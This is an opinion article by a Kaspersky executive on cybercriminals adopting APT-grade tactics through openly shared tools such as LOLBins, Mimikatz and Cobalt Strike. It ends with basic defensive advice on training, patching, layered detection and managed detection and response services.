Cybercriminals are driven by cost-effective attacks targeting vulnerable organizations that will yield a healthy profit – and they are more skilled than ever. As a result, the majority of IT security incidents are still connected by easily- performed attacks.
According to one of our incident response analytics reports, 63% of investigated attacks were caused by insufficient patch management and bad password policy, proving that a large number of companies still have problems with basic security control. It’s no wonder then that cybercrimes are so profitable: A Deloitte study found that adversaries can execute a cyberattack for as little as $34 per month with a net revenue of $25,000.
These scenarios create an impression that organizations with advanced security parameters are safe and of no interest to intruders, but as we have seen over time, that’s simply not true. Risk factors like human error and complexity of the infrastructure can offer an opening for cybercriminals in even the most secure infrastructure. Another alarming issue: Organizing and executing a quality or APT-grade attack has become easier, making them more profitable for cybercriminals.
Defining an APT-grade attack
Traditionally, advanced persistent threats (APTs) are very selective. An APT mainly aims at high-value targets such as national institutions or enterprises of national importance, and it tries to stay unnoticed for a prolonged period to gain valuable and strategic information or sabotage critical infrastructures. APTs are often costly to victims, but it’s difficult to evaluate the results of attacks in monetary terms because of the intelligence focus.
Today’s non-traditional “APT-grade” attacks use an APT toolkit that can cause tremendous impact, but these types of attacks are not the same as the traditional APTs conducted by nation-states. APT-grade intruders have more practical objectives and are less concerned with intelligence and intellectual property. Leaked APT techniques, tactics, and procedures (TTPs) help cybercriminals achieve quick and measurable profit goals, such as stealing money or getting a ransom. That’s why APT-grade adversaries are not so picky about their targets. The advanced TTPs these threats employ significantly complicate detection and response for defenders, so all kinds of organizations are at risk.
How does the githubification of crimes improve the profitability of attacks?
Today, even less advanced cybercriminals can easily obtain APT tools and conduct complex, discreet attacks because of githubification. This term describes a community-based approach in infosec that speeds up learning for defenders. Githubification assumes that information security specialists can learn together and share experience and skills to gain time, ensuring specialists will reach the level of an expert.
Unfortunately, adversaries also benefit from this process by compounding their skills so that every attacker can rise to the level of the best attacker. Bad actors find this approach time and cost-efficient because it allows the reuse of existing instruments and techniques. This makes it possible for cybercriminals to learn how to perform attacks that go unnoticed instead of creating a tool that endpoint protection solutions can automatically detect. This relates especially to fileless attacks where the code of the adversary gets located in the memory of a system process.
Recent reports also found almost half of all incidents in 2020 included the use of existing OS tools such as Living Off the Land Binaries (LOLBins), well-known offensive tools from GitHub such as Mimikatz, AdFind, and Masscan, and specialized commercial frameworks like Cobalt Strike. LOLBins are also especially popular in high-severity incidents that are usually human-driven and make a huge impact.
Natively occurring LOLBins provide the perfect disguise for malware aimed at infiltrating company infrastructure and cannot be seen by artificial intelligence (AI). AI aims to find similarities, while adversaries always invent something new and unique. AI-based technologies are often very helpful and contribute to the reduction of IT security costs, especially for detecting false-positive activities, but high-profile malicious activity is still often undetected by automated solutions. Human beings should still have the ability to detect human-driven malicious activity.
How businesses can cope with these types of attacks
What actions can companies take to protect from this growing threat and reduce the impact of cybercrimes? Here are the basic elements of a cybersecurity program:
- Train the staff. Make sure that company employees have a clear understanding of information security policy and know what risks any violations bring. Do this by implementing security awareness training.
- Patch frequently. In most cases, attackers use old unpatched vulnerabilities to penetrate the infrastructure. That’s why consistent patch management has become a must-have for all organizations. This includes regular updates of vulnerability details from software vendors, scanning the network, and OS updates.
- Combine different tactics to detect threats. Even a complex attack consists of simple steps and techniques, and detection of a particular technique can reveal the whole attack. Different detection technologies contribute to finding different adversarial techniques and maintaining a variety of security technologies raises the detection chances. At the very least, companies should use an endpoint protection platform and network intrusion detection system.
- Arm the SOC teams with relevant skills and tools. For instance, red teaming exercises have to simulate realistic complicated attacks which leverage the latest adversarial tactics, such as new evasion techniques using CLR, and provide a clear picture of the company’s operational security status.
- Deploy managed detection and response services. For companies with a lower cybersecurity maturity profile, this type of service can compensate for a SOC as it offers automatic as well as manual threat detection essential for fileless attacks. More advanced companies can still benefit from MDR because it offers additional scanning and expert evaluation of incidents.
Taking this information into consideration, it’s important for organizations to get back to security basics and minimize human risk factors when it comes to security incidents. By implementing the proper cyber hygiene, organizations will be better equipped to handle costly APT attacks.
Rob Cataldo, North American Managing Director, Kaspersky